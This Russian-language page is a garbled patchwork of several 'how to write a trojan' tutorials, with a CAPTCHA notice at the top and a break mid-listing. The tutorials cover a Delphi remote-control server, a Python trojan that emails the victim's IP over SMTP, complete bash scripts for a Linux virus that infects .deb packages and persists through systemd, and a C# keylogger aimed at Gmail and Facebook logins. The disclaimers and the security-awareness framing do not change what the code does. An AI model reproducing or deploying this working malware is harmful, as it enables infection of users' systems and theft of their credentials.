Как написать троян
Completing the CAPTCHA proves you are a human and gives you temporary access to the web property.
What can I do to prevent this in the future?
If you are on a personal connection, like at home, you can run an anti-virus scan on your device to make sure it is not infected with malware.
If you are at an office or shared network, you can ask the network administrator to run a scan across the network looking for misconfigured or infected devices.
Another way to prevent getting this page in the future is to use Privacy Pass. You may need to download version 2.0 now from the Chrome Web Store.
Cloudflare Ray ID: 71ae9117ce419bec • Your IP : 82.102.23.104 • Performance & security by Cloudflare
Сервер – Клиент Изнутри. На примере и разработка программы!
Если Вам интересно посмотреть, как пишутся «Программы сервер – клиент» и как они работают на реальном примере, предлагаю прочитать пост до конца. Будет интересно!
Пример программы я решил писать на Delphi! Так как, это проще и хорошо подходит для маленького, но реального примера. Что касается грозного слова «Троян» которое я упомянул выше, то тут, получается действительно, самый настоящий троян, но с малым и безобидным функционалом.
Вы узнаете, по какому принципу пишутся «Трояны» и как они работают изнутри! Но, есть одно «НО» Трояны не пишут, так как – это будет описано ниже. Поскольку в нашем примере, «Серверная» часть программы будет много весить (Это не приемлемо для реального трояна), и мы не будет её скрывать в системе. В реальном, «Вредоносном ПО» дела обстоят немного по другому.
Серверную часть программы стараются разработать с малым размером, ну примерно «100 КБ» Плюс — минус сколько-то КБ. И скрывают её в системе, так, что искать её придется долго!…
Но все ровно, принцип разработки один! И данный пример идеально подойдёт для понимания, как работаю программы по принципу «Сервер — Клиент» Просто у нас не правильный тон разработки трояна, а оно нам надо? Правильно. НЕТ. Мы же хорошие ребята и хулиганить не собираемся!
Как работают программы по принципу «Сервер – Клиент»
Просто и в двух словах картина выглядит вот так: Вы на своём компьютере запускаете «Клиентскую» часть программы, как правило, она имеет «GUI» то есть интерфейс пользователя (Если клиент не консольный)
На компьютере, к которому вы желаете получить доступ, запускается «Серверная» часть программы, она же открывает определённый порт на чужом компьютере и не видна в системе.
Через этот порт происходит соединения, Вы в клиенте указываете порт и IPадрес компьютера, на котором запущен сервер, подключаетесь к серверу и можете спокойно выполнять какие-то действия на чужом ПК со своего компьютера! Ещё можно прочитать мой прошлый пост и узнать:
Надеюсь, что здесь объяснил, вроде как понятно и простым человеческим языком! Если что-то не ясно, дальше, на примере все станет ясно! Далее давайте определимся, какие действия буду выполняться на удалённом ПК вследствие работы нашего маленького трояна!
Какой функционал в данном примере программы Сервер – Клиент.
Честно сказать, на этом этапе, когда размышлял, что бы показать я как-то замешкался и не как не мог придумать, что-то интересное! В общем пусть будет функционал из одной возможности и до жути простой:
— Пользователь будет получать Ваше сообщение.
Не вижу смысла добавлять какие-то другие возможности. Так как, считаю, что для примера и понимание этого вполне достаточно. Так же, думаю, не стоит писать много кода, то, что имеется ниже, то же достаточно, что бы посмотреть на программу изнутри!
А за место сообщение может быть все что угодно, зависит от фантазии человека решившего написать троян и от его знаний в программировании.
Ну, а у нас будет такой прикол! Человек, сидя за компьютером, неожиданно получит сообщение, например
представляете реакцию человека? Думаю это смешно, было бы увидеть его выражение лица.
Разработка программы по принципу «Сервер – Клиент»
Приступаем к самому интересному! И начнём мы с разработки самого «Сервера» после чего напишем под него клиент! Я не буду объяснять код программы, просто, буду приводить примеры, все же у меня не блог по программированию, да и цель поста показать поэтапно процесс разработки подобных программ по типу «Сервер – Клиент»
Разработка Сервера!
Изначально, нужно научить «Сервер» открывать какой-то порт на компьютере, дабы в дальнейшем иметь возможность подключиться к нему из «Клиента» а уже после научим принимать команды и выполнять какие-то действия на ПК.
Откроем порт следующим кодом, который до боли прост:
Теперь если запустить программу появится просто, пустое окно без всяких кнопок и прочих элементов. И самое главное, на компьютере будет открыт порт с номером «666» Именно на этот порт в дальнейшем будем отправлять команды на сервер, и он в свою очередь будет их обрабатывать.
А пока убедимся, что сервер работает и порт открыт, вспоминаем команду «netstat» и смотрим результат.
Как видим на компьютере, вследствие запуска нашей программы действительно был открыт порт с номером «666» Это говорит только ободном, программа работает, и пришла пора научить «Сервер» принимать сообщение.
Тут дела обстоят следующие образом! Если серверу придёт команда с названием «MESSAGE_TEXT» (Название может быть любое) то сработает процедура «ShowMessage» и покажет сообщение, которое пришло вмести с командой и хранится в строковой переменной «komm»
Соответственно текст сообщение будем набирать в «Клиенте» и он может быть любого содержание!
В прочем, на этом разработка «Серверной» части закончена. В итоге у нас получился файлик «Server.exe» и пока отложим его в сторону до того момента пока не напишем «Клиент»
Разработка Клиента!
Клиент у нас будет по понятным причинам с графическим интерфейсом пользователя (GUI) и должен иметь элементы управление, кнопки и поля ввода. У меня получился вот такой вид программы:
Определимся со всеми элементами! Хотя и так понят но, как говорится, на всякий случай поясню.
— IP: Поля для ввода IPкомпьютера, где запущен сервер.
— Port: Указываем номер порта на котором висит сервер.
— Подключится: Кнопка для подключения к серверу.
— Текст сообщение: Поле для ввода сообщение, которое нужно отправить.
— Отправить сообщение…: Соответственно кнопка для отправки сообщение.
— Статус соединение: Тут мы узнаем, подключились или нет!
Дальше пробуем научить «Клиент» подключаться к серверу и проверим, как это работает. В данном варианте, код для кнопки «Подключится» выглядит так:
Крадущийся питон. Создаем простейший троян на Python
Конечно, приведенные в статье скрипты никак не годятся для использования в боевых условиях: обфускации в них нет, принципы работы просты как палка, а вредоносные функции отсутствуют напрочь. Тем не менее при некоторой смекалке их возможно использовать для несложных пакостей — например, вырубить чей‑нибудь компьютер в классе (или в офисе, если в классе ты не наигрался).
Теория
Итак, что вообще такое троян? Вирус — это программа, главная задача которой — самокопирование. Червь активно распространяется по сети (типичный пример — «Петя» и WannaCry), а троян — скрытая вредоносная программа, которая маскируется под «хороший» софт.
Логика подобного заражения в том, что пользователь сам скачает себе вредонос на компьютер (например, под видом крякнутой программы), сам отключит защитные механизмы (ведь программа выглядит хорошей) и захочет оставить надолго. Хакеры и тут не дремлют, так что в новостях то и дело мелькают сообщения о новых жертвах пиратского ПО и о шифровальщиках, поражающих любителей халявы. Но мы‑то знаем, что бесплатный сыр бывает только в мусорке, и сегодня научимся очень просто начинять тот самый сыр чем‑то не вполне ожидаемым.
warning
Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный материалами данной статьи. Несанкционированный доступ к информации и нарушение работы систем могут преследоваться по закону. Помни об этом.
Определяем IP
Сначала нам (то есть нашему трояну) нужно определиться, где он оказался. Важная часть твоей информации — IP-адрес, по которому с зараженной машиной можно будет соединиться в дальнейшем.
Начнем писать код. Сразу импортируем библиотеки:
Обе библиотеки не поставляются с Python, поэтому, если они у тебя отсутствуют, их нужно установить командой pip .
Если ты видишь ошибку, что у тебя отсутствует pip, сначала нужно установить его с сайта pypi.org. Любопытно, что рекомендуемый способ установки pip — через pip, что, конечно, очень полезно, когда его нет.
Код получения внешнего и внутреннего адресов будет таким. Обрати внимание, что, если у жертвы несколько сетевых интерфейсов (например, Wi-Fi и Ethernet одновременно), этот код может вести себя неправильно.
Если с локальным адресом все более‑менее просто — находим имя устройства в сети и смотрим IP по имени устройства, — то вот с публичным IP все немного сложнее.
Я выбрал сайт api. ipify. org , так как на выходе нам выдается только одна строка — наш внешний IP. Из связки публичный + локальный IP мы получим почти точный адрес устройства.
Вывести информацию еще проще:
Никогда не встречал конструкции типа print( f’ ‘) ? Буква f означает форматированные строковые литералы. Простыми словами — программные вставки прямо в строку.
Строковые литералы не только хорошо смотрятся в коде, но и помогают избегать ошибок типа сложения строк и чисел (Python — это тебе на JavaScript!).
Нет, я не собираюсь рассказывать, как написать своего шифровальщика-вымогателя, майнера или эксплуатировать супер-новую уязвимость, как вы могли подумать. И тем более я не горю желанием поднимать холивар «Linux безопаснее Windows?(да)». Моей целью было написание простого вируса для linux, некого, так сказать, «Just for Fun», единственной функцией которого является распространение своей копии. О том, что у меня получилось, я расскажу в этой статье. В конце я приведу ссылку на GitHub с исходниками.
Дисклеймер
Данная статья написана в ознакомительных целях. Автор ни в коем случае не призывает читателей к нарушению законодательства РФ. Пожалуйста, не повторяйте действия, описанные в данной статье, предварительно не ознакомившись с главой 28 УК РФ.
И что мы, собственно, будем делать?
Самым простым в реализации механизмом распространения вируса для меня показалось распространение через модифицированные deb/rpm пакеты. Пакеты формата deb и rpm сейчас являются наиболее популярным средством распространения по для Linux. Я остановил свой выбор на формате deb, так как количество пользователей Debian-based дистрибутивов преобладает над пользователями Red Hat и ее «последователей».
Еще необходимо, чтобы вирус автоматически запускался, и через каждый определенный период времени сканировал компьютер в поисках deb-пакетов. Для удобства отладки я выбрал период равный 10 минутам.
Что такое deb-пакет?
Deb-пакет представляет из себя архив формата .ar, который не использует сжатие. Внутри архива еще три файла: debian-bynary, control.tar и data.tar
debian.binary — текстовый файл, содержащий версию формата deb-пакета, на данный момент там всегда пишут «2.0».
control.tar — архив с файлами, содержащими информацию о пакете (например — обязательный файл control) и пакеты, необходимые для установки пакета (например — скрипты preinst, postinst, prerm и postrm, запускаемые до/после установки/удаления пакета). Может быть сжат с помощью gzip или xz, в таком случае к имени архива добавляется расширение .gz или .xz соответственно.
data.tar — архив с директориями, содержащими устанавливаемые файлы. Директории представлены деревом, в виде которого они должны извлечься в корень файловой системы. Может быть сжат с помощью gzip, bzip2, lzma, xz.
Нам необходимо обратить внимание на файл control из архива control.tar. Этот файл содержит информацию о пакете, такую как автор, описание, версию, приоритет пакета в системе и т. д. Меня интересует поле depends, в котором указаны зависимости (пакеты, без которых по из данного пакета не может работать). В это поле наш вирус будет дописывать fakeroot и dpkg — утилиты, которые понадобятся при модификации других пакетов на зараженном компьютере.
Для сборки deb-пакета создается корневая директория пакета. В нее кладутся директории с устанавливаемыми файлами и директория DEBIAN, содержащую служебные файлы, среди которых control и скрипты для установки/удаления. Затем выполняется команда fakeroot dpkg-deb —build ./path.
Сначала был демон
На момент написания вируса я еще плохо представлял, что такое Cron, и поэтому пошел путем написания собственного демона для systemd. Я создал файл trojan_penguin.service, который будет помещаться в директорию /lib/systemd/system, и добавил в нее следующее:
[Unit]
Description = XXX
[Service]
ExecStart=/usr/bin/trojan_penguin.sh
Type=fork
[Install]
WantedBy=multi-user.target
ExecStart=/usr/bin/trojan_penguin.sh — тут я указал путь к файлу (к будущему вирусу), который должен запускаться при старте системы.
Type=fork — это строка показывает, что процесс должен ответвиться от родительского процесса.
Я не видел необходимости в PID-файле, по этому я не стал его добавлять.
В мануалах по написанию своего демона фалы .service предлагается размещать в директориях /usr/lib/systemd/system/ или /etc/systemd/system/. Но я в своей убунте нашел директорию /lib/systemd/system. (у меня туда попал apache2.service). Может быть кто-нибудь в комментариях напишет, для чего нужна эта директория, и чем она отличается от двух других.
Файл /usr/bin/trojan_penguin.sh у меня получился таким:
#!/bin/bash
#debug=".../Programming/projects/TrojanPenguin"
debug=""
#создаем папку для записи логов, если таковой нет
if ! [ -d $debug/var/log/trojan_penguin/ ]; then
mkdir $debug/var/log/trojan_penguin
fi
#работаем в бесконечном цикле,
#делая паузы по 10 минут
while [ 1 ]
do
list=$(find /home -name "*.deb") #ищем deb-пакеты
# для каждого найденного пакета выполняем следующий цикл
for line in $list
do
$debug/usr/bin/tp_infect.sh $line >> $debug/var/log/trojan_penguin/log #запускаем цикл, модифицирующий пакет, а логи записываем в файл log
done
date > $debug/var/log/trojan_penguin/last_start #записываем время последней отработки вируса (мне это помогло во время отладки)
sleep 600 #пауза (60 * 10 сек = 10 мин)
done
Мы ищем deb-пакеты в разделе /home (а где их еще искать то?), пути к найденным файлам записываем в переменную list. Потом просто перебираем все строки из line и для каждого файла запускаем скрипт tp_infect.sh, который заразит этот файл. Когда я писал вирус, скрипты находились в отдельной директории, и для удобства я создал переменную debug, в которой я прописал путь к этой папке.
Демон готов, осталось научиться его запускать при старте системы. Для этого я написал скрипт postinstall. Он будет запускаться сразу после установки зараженного пакета и указывать, чтобы наш вирус запускался вместе с системой. Разместил я его в директории «/usr/bin/», чтобы от туда копировать его в заражаемые пакеты.
#!/bin/bash
#debug="/home/dima/Dropbox/Programming/projects/TrojanPenguin/TrojanPenguin"
debug=""
systemctl daemon-reload #не знаю почему, но без этой команды демон у меня иногда отказывался работать
systemctl enable trojan_penguin.service #включаем автозапуск вместе с системой
systemctl start trojan_penguin.service #запускаем демон
Модифицируем deb-пакет
Как я писал выше, архивы, содержащиеся в deb-пакете могут иметь разные разрешения. Я не стал заморачиваться, и рассмотрел только тот случай, когда архивы сжаты с помощью .xz. Файл /usr/bin/tp_infect.sh, отвечающий за модификацию, получил такое содержимое:
#!/bin/bash
#debug=".../Programming/projects/TrojanPenguin"
debug=""
temp="$debug/tmp/trojan_penguin"
#создаем временные папки
mkdir $temp
mkdir $temp/new
mkdir $temp/new/DEBIAN
#распакуем пакет
ar -p $1 data.tar.xz | tar -xJ -C $temp/new
ar -p $1 control.tar.xz | tar -xJ -C $temp/new/DEBIAN/
#отредактируем control
#в новый control копируем все поля до "Deepends", затем копируем поле "Deepends", дописывая наши зависимости, после чего добавляем оставшиеся поля.
cp $temp/new/DEBIAN/control $temp/orig_control
cat $temp/orig_control | grep --before-context=100 Depends | grep -v Depends > $temp/new/DEBIAN/control
cat $temp/orig_control | grep Depends | tr -d 'rn' >> $temp/new/DEBIAN/control
echo ", fakeroot, python" >> $temp/new/DEBIAN/control
cat $temp/orig_control | grep --after-context=100 Depends | grep -v Depends >> $temp/new/DEBIAN/control
#скормим пакету наш постинстал
cp $debug/usr/bin/tp_postinst.sh $temp/new/DEBIAN/postinst
#достроим дерево с нужными нам директориями, если таковых нет
if ! [ -d $temp/new/usr ];
then
mkdir $temp/new/usr
fi
if ! [ -d $temp/new/usr/bin ];
then
mkdir $temp/new/usr/bin
fi
if ! [ -d $temp/new/lib ];
then
mkdir $temp/new/lib
fi
if ! [ -d $temp/new/lib/systemd ];
then
mkdir $temp/new/lib/systemd
fi
if ! [ -d $temp/new/lib/systemd/system ];
then
mkdir $temp/new/lib/systemd/system
fi
#копируем наши файлы
cp $debug/usr/bin/trojan_penguin.sh $temp/new/usr/bin/trojan_penguin.sh
cp $debug/usr/bin/tp_infect.sh $temp/new/usr/bin/tp_infect.sh
cp $debug/usr/bin/tp_postinst.sh $temp/new/usr/bin/tp_postinst.sh
cp $debug/lib/systemd/system/trojan_penguin.service $temp/new/lib/systemd/system/
#Собираем пакет, перемещаем его на место старого и удаляем папку, в которой мы работали.
fakeroot dpkg-deb --build $temp/new
cp $temp/new.deb $1
rm -R $temp
Проблемы с postinstall
Все бы хорошо, но теперь у нас проблема. А что если в пакете уже есть postinstal? Оригинальный postinstal может быть написан на разных языках (python, bash…), может это даже бинарник. Это не позволят нам просто взять и дописать свой postinstall в него. Я решил эту проблему следующим образом:
Добавил в скрипт tp_infect.sh такую вещь:
#Проверяем, есть ли в пакете postinstal. Если да, то копируем его в другое место.
if [ -f $temp/new/usr/bin/postinst ];
then
cp $temp/new/DEBIAN/postinst $debug/usr/bin/tp_orig_postinst
fi
А в postinstal вот это:
#выполняем оригинальный постинстал и удаляем его
if [ -f $debug/usr/bin/tp_orig_postinst ]; then
$debug/usr/bin/tp_orig_postinst
rm $debug/usr/bin/tp_orig_postinst
fi
Одну проблему я решил, но появилась другая. Наш вирус будет модифицировать пакет, даже если он уже заражен. При модификации вирус увидит, что в пакете есть postinstal (который на самом деле наш), переместит его в /usr/bin/, тем самым перезаписав оригинал. Чтобы этого избежать, я добавил проверку в «tp_infect.sh», модифицировали мы этот файл или нет:
if [ -f $temp/new/usr/bin/trojan_penguin.sh ];
then
rm -R $temp
exit 0
fi
Собираем воедино
Вирус готов. Вот ссылка на GitHub, как и обещал. Этот вирус можно собрать в отдельный deb-пакет (запустите makedeb.sh) из репозитория. Чтобы внедрить вирус в какой-либо пакет, достаточно выполнить команду:
tp_infect.sh /путь заражаемому deb-пакету/
В репозитории есть две копии скрипта postinst
DEBIAN/postinst — эта копия выполняется только при установке пустого пакета с вирусом. Я его закомментировал, чтобы вирус не запускался после установки, а модивиццировал пакеты только по команде.
usr/bin/postinst — это копия вставляется в заражаемые пакеты.
Итог
А вывод очевиден и без этой статьи: не стоит скачивать и запускать программы из непроверенных источников.
Ради любопытства, я отправил deb-пакет с вирусом на VirusTotal для анализа. На момент написания статьи ни один антивирус не задетектировал его. Вот ссылка на отчет. Интересно, сколько должно пройти времени, и сколько хостов нужно заразить этим вирусом, чтобы антивирусы обратили на него внимание?
Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.
В интернете очень мало информации о вирусах для Linux систем, а в частности для семейства linux. Я хочу развить эту тему на Хабре в виде серии из нескольких статей. Прошу, ответить на опрос: какие из тем по вашему мнению являются наиболее интересными?
5.33%
Создание вируса, заражающего RPM-пакеты
9
10.65%
Создание вируса, собирающего данные о пользователях
18
29.59%
Делаем простой ботнет
50
21.89%
Методы защиты от вирусов ОС семейства Linux
37
8.88%
Обзор антивирусных решений для ОС семейства Linux
15
13.02%
Обзор крупных вирусных атак на ОС семейства Linux
22
6.51%
Не ограничивайся одним Linux, расширь эту тему до UNIX
11
4.14%
Мне не интересно про вирусы для ОС семейства Linux
7
0%
Свой вариант (напишу в комментариях)
0
Проголосовали 169 пользователей.
Воздержались 40 пользователей.
Время на прочтение
6 мин
Количество просмотров 134K
Хакерский мир можно условно разделить на три группы атакующих:
1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО.
2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее.
3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля.
Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.
Зачем ИБ-персоналу эти сомнительные навыки?
Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.
Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков.
Кейлогер
Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.
Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.
Начнем.
Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:
1. [DllImport("user32.dll")]
2.
3. public static extern int GetAsyncKeyState(Int32 i);
Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:
Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:
1. while (true)
2. {
3. Thread.Sleep(100);
4. for (Int32 i = 0; i < 255; i++)
5. {
6. int state = GetAsyncKeyState(i);
7. if (state == 1 || state == -32767)
8. {
9. Console.WriteLine((Keys)i);
10.
11. }
12. }
13. }
Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.
Умный кейлогер
Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.
Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.
Вторая версия кода:
1. while (true)
2. {
3. IntPtr handle = GetForegroundWindow();
4. if (GetWindowText(handle, buff, chars) > 0)
5. {
6. string line = buff.ToString();
7. if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up "))
8. {
9. //проверка клавиатуры
10. }
11. }
12. Thread.Sleep(100);
13. }
Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.
Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.
Еще более умный кейлогер
Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.
Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:
1. //Ищем почтовый адрес
2. ^[w!#$%&'*+-/=?^_`{|}~]+(.[w!#$%&'*+-/=?^_`{|}~]+)*@((([-w]+.)+[a-zA-Z]{2,4})|(([0-9]{1,3}.){3}[0-9]{1,3}))$
3.
4.
5. //Ищем пароль
6. (?=^.{6,}$)(?=.*d)(?=.*[a-zA-Z])
Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.
Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.
Для C# это выглядит так:
1. Regex re = new Regex(@"^[w!#$%&'*+-/=?^_`{|}~]+(.[w!#$%&'*+-/=?^_`{|}~]+)*@((([-w]+.)+[a-zA-Z]{2,4})|(([0-9]{1,3}.){3}[0-9]{1,3}))$");
2. Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*d)(?=.*[a-zA-Z])");
3. string email = "Oded.awask@gmail.com";
4. string pass = "abcde3FG";
5. Match result = re.Match(email);
6. Match result2 = re2.Match(pass);
Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.
Бесплатно и полностью не обнаружим
В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.
Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?
Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.
В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.
Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.
В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.
Содержание
- 1 Как написать троян на Python
- 1.1 Определение IP-адреса
- 1.2 Бэкконнект по почте
- 1.3 Создание трояна на Python
- 1.4 Создание WiFi-стилера на Python
- 2 Заключение
В этой статье я расскажу, как написать простой троян на Python с удаленным доступом, а для большей скрытности мы встроим его в игру. Даже если вы не знаете Python, то сможете лучше понять, как устроены такие вредоносы, и поупражняться в программировании.
Еще по теме: Как написать вирус на Python
Конечно, приведенные в статье скрипты совсем не годятся для использования в боевых условиях: обфускации в них нет, принципы работы просты как палка, а вредоносные функции отсутствуют вовсе. Тем не менее при желании их возможно использовать для несложных пакостей или приколов.
Как написать троян на Python
Итак, что есть троян? Вирус — это программа, главная задача которой — самокопирование. Червь активно распространяется по сети (типичный пример — «Петя» и WannaCry), а троян — скрытая вредоносная программа, которая маскируется под «хороший» софт и шпионить за пользователем. Подробнее о троянах в статье «Что такое RAT».
Логика подобного заражения в том, что пользователь сам скачает себе вредонос на компьютер (например, под видом крякнутой программы), сам отключит защитные механизмы (ведь программа выглядит хорошей) и захочет оставить надолго.
Хакеры и тут не дремлют, так что в новостях то и дело мелькают сообщения о новых жертвах пиратского ПО и о шифровальщиках, поражающих любителей халявы. Но мы‑то знаем, что бесплатный сыр бывает только в мусорке, и сегодня научимся очень просто начинять тот самый сыр чем‑то не вполне ожидаемым.
Вся информация предоставлена исключительно в ознакомительных целях. Ни автор статьи, ни редакция сайта spy-soft.net не несут ответственности за любой возможный вред, причиненный данным материалом. Несанкционированный доступ к информации и нарушение работы систем могут преследоваться по закону. Не забывайте об этом!
Определение IP-адреса
Для начала нам (то есть нашему трояну) нужно понять, где он оказался. Важная часть вашей информации — IP-адрес, по которому с зараженной машиной можно будет соединиться в дальнейшем.
Начнем писать код. Сразу импортируем библиотеки:
import socket from requests import get |
Обе библиотеки не поставляются с Python, поэтому, если они у вас отсутствуют, их нужно установить командой
pip.
pip install socket pip install requests |
Если вы видите ошибку, что у вас отсутствует pip, сначала нужно установить его с сайта pypi.org. Любопытно, что рекомендуемый способ установки pip — через pip, что, конечно, очень полезно, когда его нет.
Код получения внешнего и внутреннего адресов будет таким. Обратите внимание, что, если у жертвы несколько сетевых интерфейсов (например, WiFi и Ethernet одновременно), этот код может вести себя неправильно.
# Определяем имя устройства в сети hostname = socket.gethostname() # Определяем локальный (внутри сети) IP-адрес local_ip = socket.gethostbyname(hostname) # Определяем глобальный (публичный / в интернете) IP-адрес public_ip = get(‘http://api.ipify.org’).text |
Если с локальным адресом все более‑менее просто — находим имя устройства в сети и смотрим IP по имени устройства, — то вот с публичным IP все несколько сложнее.
Я выбрал сайт
api.<wbr />ipify.<wbr />org, так как на выходе нам выдается только одна строка — наш внешний IP. Из связки публичный + локальный IP мы получим почти точный адрес устройства.
Вывести информацию еще проще:
print(f‘Хост: {hostname}’) print(f‘Локальный IP: {local_ip}’) print(f‘Публичный IP: {public_ip}’) |
Никогда не встречал конструкции типа
print(<wbr />f‘{}<wbr />’)? Буква
f означает форматированные строковые литералы. А по простому — программные вставки прямо в строку.
Строковые литералы не только хорошо смотрятся в коде, но и помогают избегать ошибок типа сложения строк и чисел (Python — это вам на JavaScript!).
Финальный код:
import socket from requests import get hostname = socket.gethostname() local_ip = socket.gethostbyname(hostname) public_ip = get(‘http://api.ipify.org’).text print(f‘Хост: {hostname}’) print(f‘Локальный IP: {local_ip}’) print(f‘Публичный IP: {public_ip}’) |
Запустив этот скрипт, мы сможем определить IP-адрес нашего (или чужого) компьютера.
Бэкконнект по почте
Теперь напишем скрипт, который будет присылать нам письмо.
Импорт новых библиотек (обе нужно предварительно поставить через
pip <wbr />install):
import smtplib as smtp from getpass import getpass |
Пишем базовую информацию о себе:
# Почта, с которой будет отправлено письмо email = ‘demo@spy-soft.net’ # Пароль от нее (вместо ***) password = ‘***’ # Почта, на которую отправляем письмо dest_email = ‘demo@spy-soft.net’ # Тема письма subject = ‘IP’ # Текст письма email_text = ‘TEXT’ |
Дальше сформируем письмо:
message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text) |
Последний штрих — настроить подключение к почтовому сервису. Я пользуюсь Яндекс.Почтой, поэтому настройки выставлял для нее.
server = smtp.SMTP_SSL(‘smtp.yandex.com’) # SMTP-сервер Яндекса server.set_debuglevel(1) # Минимизируем вывод ошибок (выводим только фатальные ошибки) server.ehlo(email) # Отправляем hello-пакет на сервер server.login(email, password) # Заходим на почту, с которой будем отправлять письмо server.auth_plain() # Авторизуемся server.sendmail(email, dest_email, message) # Вводим данные для отправки (адреса свой и получателя и само сообщение) server.quit() # Отключаемся от сервера |
В строке
server.<wbr />ehlo(<wbr />email) мы используем команду
EHLO. Большинство серверов SMTP поддерживают
ESMTP и
EHLO. Если сервер, к которому вы пытаетесь подключиться, не поддерживает
EHLO, можно использовать
HELO.
Полный код этой части трояна:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
